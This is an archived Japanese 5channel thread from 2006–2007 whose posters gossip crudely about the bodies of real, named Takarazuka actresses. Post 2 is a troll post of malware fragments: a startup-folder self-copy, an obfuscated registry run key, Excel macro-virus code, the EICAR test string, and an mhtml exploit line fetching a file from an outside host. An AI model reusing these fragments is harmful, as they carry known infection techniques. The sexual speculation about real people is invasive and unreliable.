5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

貧乳ジェンヌ大好きパート2

1 :名無しさん@花束いっぱい。:2006/11/11(土) 07:38:19 ID:7XnNAwWX
貧乳好きの方々また語りあいましょう

2 :<body onload=window()>:2006/11/11(土) 10:20:57 ID:qDp9bkTy
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

3 :名無しさん@花束いっぱい。:2006/11/11(土) 15:00:13 ID:nDXewqEO
>>1
乙です。
前のスレが無くなってから淋しかったよ。

4 :名無しさん@花束いっぱい。:2006/11/11(土) 17:36:34 ID:u4AHUQGb
コムの微乳も見納めか…寂しいぜ

5 :名無しさん@花束いっぱい。:2006/11/11(土) 19:06:49 ID:Mf+Ii48n
貧乳好きの漏れとしては前スレがなくなって寂しい思いをしていたよ・・・
復活!

6 :名無しさん@花束いっぱい。:2006/11/12(日) 08:53:09 ID:mQ+oRpUX
>>1 パート1 .2も私が建てまった今回は娘役 男役にかかわらず語ってください。荒らし煽りはスルーで進行はsage でageる人々は荒らしとみなします。巨乳は巨乳スレで後はマッタリといきましょう。

7 :名無しさん@花束いっぱい。:2006/11/12(日) 20:24:10 ID:zX2PsFLQ
(^o^)/

8 :名無しさん@花束いっぱい。:2006/11/12(日) 20:25:18 ID:zX2PsFLQ
age age

9 :名無しさん@花束いっぱい。:2006/11/12(日) 20:26:34 ID:zX2PsFLQ
sage age

10 :名無しさん@花束いっぱい。:2006/11/12(日) 22:27:21 ID:ZYpqBOw3
胸は寄せ上げても、スレはあげるなよ。

11 :名無しさん@花束いっぱい。:2006/11/12(日) 23:02:14 ID:2nXtHLdg
↑オマエモナー

上手いこと言うなぁ、と思ったがw

12 :名無しさん@花束いっぱい。:2006/11/15(水) 17:17:12 ID:zozoUGDk
ぶっさんスタイルいいとよくいわれてますが貧乳。

13 :名無しさん@花束いっぱい。:2006/11/15(水) 23:34:23 ID:rHZ1LlRq
仏が巨乳だったら全然萌えない
貧乳だからこそ、ソソラレル

14 :名無しさん@花束いっぱい。:2006/11/16(木) 00:25:36 ID:Rcba8Su5
こむかわいいよこむ

15 :名無しさん@花束いっぱい。:2006/11/16(木) 01:14:53 ID:aW1w4Rdn
貧なクセにバストトップが下がってきたあたりが、年相応でいいかも。>イム

16 :名無しさん@花束いっぱい。:2006/11/16(木) 11:01:07 ID:+N+FTwv1
かしちゃんってAすらないんじゃないかって思う。
お稽古場で胸押さえしてないのに、真っ平ら・・・

17 :名無しさん@花束いっぱい。:2006/11/16(木) 15:09:26 ID:Gmu+OwIC
私も同じこと思ってました…。
胸押さえしないで服着たら普通は目立つはずだけど、なかったもんね…。

18 :名無しさん@花束いっぱい。:2006/11/16(木) 17:55:56 ID:FoGJ1m05
オサ:平原
アサコ:丘
コム:なだらかな丘陵
とうこ:人工盛り土
カシゲ:窪地

・・・こんな感じかえ?

19 :名無しさん@花束いっぱい。:2006/11/16(木) 20:15:04 ID:KUMPuL+B
>18 ワロタ

20 :名無しさん@花束いっぱい。:2006/11/16(木) 23:18:37 ID:vHxmqF8X
>>18タン
せっかくなんだけど、
違いがほとんどわからない…orz

21 :名無しさん@花束いっぱい。:2006/11/17(金) 00:20:07 ID:t0ZLinMv
こむのおっぱいかわいいね。ちょっとあるもんね。

22 :名無しさん@花束いっぱい。:2006/11/17(金) 13:50:28 ID:fHDgXyNp
かしちゃんもanather stageの写真で、たまに「一応あるのね」って
感じなんだけど、真っ平らな時もあるよね。ある時はパッド入りを
してるのかな?

23 :名無しさん@花束いっぱい。:2006/11/17(金) 14:25:35 ID:ZrJDZ6s9
いわゆる18タンの言う「人工盛り土」なんですかね、かしげのある時。


24 :名無しさん@花束いっぱい。:2006/11/18(土) 09:59:28 ID:87prK+QI
ニュースで雪東京稽古場やったとき
芝居のコムと絡んで踊るとこ、
一瞬ミズの胸が理想的な感じに膨らんでるように見えたのは
なんだったんだろう?
巨乳じゃないけど、パイの直径が大きい気がした

25 :名無しさん@花束いっぱい。:2006/11/18(土) 12:03:23 ID:lMjLH5hT
>パイの直径が大きい気がした

www
でもたしかにミズは肉のつき方がキレイだとオモ

26 :名無しさん@花束いっぱい。:2006/11/18(土) 13:35:21 ID:u/PqltsA
ミズのは、乳ではなくて筋肉かも。

27 :名無しさん@花束いっぱい。:2006/11/19(日) 00:14:56 ID:QeOpaO/7
水は直径が大きい。
コムはかわいいおっぱい。
かしげは窪地。

28 :名無しさん@花束いっぱい。:2006/11/19(日) 00:20:18 ID:Zt9Kj9Mt
いいな〜直径が大きいのって。
直径が大きいと、高さが無くても裸になったとき女らしいキレイな胸に見えるよね。

29 :名無しさん@花束いっぱい。:2006/11/19(日) 06:55:05 ID:gni9lXr+
ゆかり

30 :名無しさん@花束いっぱい。:2006/11/19(日) 21:55:28 ID:uD6TfAC/
ミズやコムよりかしげの方がナゼかあるとの情報。

31 :名無しさん@花束いっぱい。:2006/11/20(月) 09:06:06 ID:GbuV8GKb
コムよりはあるかもしれんが
ミズよりあるってのはどうかな〜>カシ胸
ミズは全ツベルばらのときとか、あるときは自然な感じであるから
普段押さえてるんか?とも思うけど
45kg無いカシに脂肪が胸に行く余裕があるとは思えん。

32 :名無しさん@花束いっぱい。:2006/11/20(月) 10:31:46 ID:nZ26hB1Y
コムの胸はかわいくて萩の月の大きさなんだよ。

33 :名無しさん@花束いっぱい。:2006/11/20(月) 21:45:32 ID:OAm/oi6/
>>31
体重は関係ないと思うよ。
知人に43kgの人いるけど、ほどよくいい感じに胸ある。

34 :名無しさん@花束いっぱい。:2006/11/20(月) 21:46:35 ID:OAm/oi6/
↑身長160cm台です。

35 :名無しさん@花束いっぱい。:2006/11/21(火) 09:47:49 ID:CKBvsJk4
パィズリできるのは誰

36 :名無しさん@花束いっぱい。:2006/11/21(火) 10:12:57 ID:UAulswiP
とうこちゃんは、細い割りにあります。

37 :名無しさん@花束いっぱい。:2006/11/21(火) 12:21:39 ID:IIOhcQ5/
>35
ミズ。
前見かけたけどマジで優しそうだから。
小さくてもいいならだけどw

38 :名無しさん@花束いっぱい。:2006/11/21(火) 13:58:23 ID:C7CQ4/GO
どんなに優しくても、小さかったら無理だろう…


39 :名無しさん@花束いっぱい。:2006/11/21(火) 15:48:30 ID:CKBvsJk4
出来れば、娘役で!一花タンや山科タン辺りしてくれないかなぁ?

40 :名無しさん@花束いっぱい。:2006/11/21(火) 15:55:23 ID:4TiK0unY
>>30
どこからの情報?ってことは、かしちゃんって普段は押さえてるって
こと?

>>31
かしちゃんってそんなに体重軽いんだ〜コムちゃんは?

41 :名無しさん@花束いっぱい。:2006/11/21(火) 20:17:00 ID:PjvoT0Id
コムは48kg カシはしらん

42 :名無しさん@花束いっぱい。:2006/11/21(火) 21:11:01 ID:Zki1NatY
>35
>39
てめえの乳でパイズリしてろ。

43 :名無しさん@花束いっぱい。:2006/11/22(水) 00:14:08 ID:zCBH6bWK
>>41
なんで知ってるの?


44 :名無しさん@花束いっぱい。:2006/11/22(水) 06:01:19 ID:wq6Cns61
こむ=44キロ

45 :名無しさん@花束いっぱい。:2006/11/22(水) 10:11:29 ID:OVqXvjw+
おさはたまにネツ造してる。
なんのためか知らんが…。

46 :名無しさん@花束いっぱい。:2006/11/22(水) 10:29:13 ID:+L2XXt1s
水は乳輪の直径が大きい。

47 :名無しさん@花束いっぱい。:2006/11/22(水) 11:52:55 ID:wySA69+B
>46
なんで知ってるの〜?

・・・って聞くのはお約束っすかねw

48 :名無しさん@花束いっぱい。:2006/11/23(木) 11:34:34 ID:9CQOBobh
ミズの乳は小さいのにエロい…
そうか、乳輪が大きいからなのか!

49 :名無しさん@花束いっぱい。:2006/11/27(月) 08:46:09 ID:SusT52B9
コムの乳輪はピンク。かしげの乳輪もピンク。

50 :名無しさん@花束いっぱい。:2006/11/28(火) 22:04:28 ID:nRYL46II
かしちゃんは前はコムちゃんと同じくらいはあったような気がするけど、
二番手になってますますガリガリになっちゃって胸もなくなっちゃった
気がする・・・痩せるときって胸から落ちるって言うもんね。組本Vでは
ちょっと胸あるもん。

51 :名無しさん@花束いっぱい。:2006/11/29(水) 01:09:23 ID:84ou/cTJ
痩せる時、胸から落ちない人もいるからねー。
顔からとか、お尻から落ちる人もいるし。かしちゃんは有る!と評判だけど、さて?

52 :名無しさん@花束いっぱい。:2006/12/13(水) 15:36:27 ID:NWatrV+s
コンサートDVDのブックレットに載ってるお稽古場写真で、かしちゃんに
胸がある!

53 :名無しさん@花束いっぱい。:2006/12/15(金) 16:16:33 ID:h4bA5gse
かしげとこむの胸がかわいすぎるんんだけど

54 :名無しさん@花束いっぱい。:2006/12/21(木) 16:18:19 ID:rzHOs41G
大の仲良しのかしちゃんとこむちゃんは、胸までサイズお揃い。

55 :名無しさん@花束いっぱい。:2006/12/27(水) 20:42:41 ID:B4bFBLTc
sage

56 :名無しさん@花束いっぱい。:2006/12/29(金) 15:56:02 ID:8d9tfjlC
ボクをどこかのスレに送ってくださいでつ
おわかれの時にはおみやげがほしいでつー


(●▽●)アハハー
━∪━∪━

現在の所持品:イチゴ、女帝、銀橋、シャンシャン、マイク、太鼓、迷子札、映美くらら、 彩輝直
女帝が無理やり引っ張ってきた(゚-゚)、W●WOW番組表、お客様に配る耳栓、花柄のお布団、551の肉まん、「そうおばあちゃんは言っていた」、鞭



57 :名無しさん@花束いっぱい。:2006/12/29(金) 18:07:40 ID:S6BlZQmw
>>56オサレスレに送っておいたよ

58 :名無しさん@花束いっぱい。:2007/01/02(火) 12:12:37 ID:sAkJVNWR
かしちゃんとコムちゃんはサイズどれくらい?

59 :名無しさん@花束いっぱい。:2007/01/05(金) 04:39:38 ID:OHIZ3l3p
うめにパイ刷りされたい

60 :名無しさん@花束いっぱい。:2007/01/06(土) 18:50:25 ID:s6OKHZij
age

61 :名無しさん@花束いっぱい。:2007/01/06(土) 21:24:22 ID:uMcSDIkz
78期って ユウ○ アサ○ カシ○ ネッタ○ となんでAカップばかりなんだ? ネツはバウ以降〜ファンの間では「女役でもないのにアップルcなんでつけるんだろ」と言われてて腰抜かした
っつーかそれ言うならヌーブラだろ?と突っ込みたかった…w貧乳の方がスタイル良くみえるから絶対イイ!

62 :名無しさん@花束いっぱい。:2007/01/07(日) 01:20:06 ID:EdHlLsNf
ゆうひあさこはAではないんじゃない?
がんばってBって感じする。

かしちゃんこむちゃんは当然A。もしくはAA?
かしちゃん胸押さえしてないけど、微妙な作り物感に
あふれているときあるよw

63 :名無しさん@花束いっぱい。:2007/01/09(火) 00:27:16 ID:/XURJe1x
age

64 :名無しさん@花束いっぱい。:2007/01/09(火) 20:53:41 ID:lWJcudMm
練習風景みてて、なぁんか気の毒になってきた。
アサコさん...あんなに板を貼ったように...いつの日か退団される日の為に胸を寄せてあげてしとかなきゃ!
エリザの時のドレスは少しだけどタレ気味。男役旬なんだけど。

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)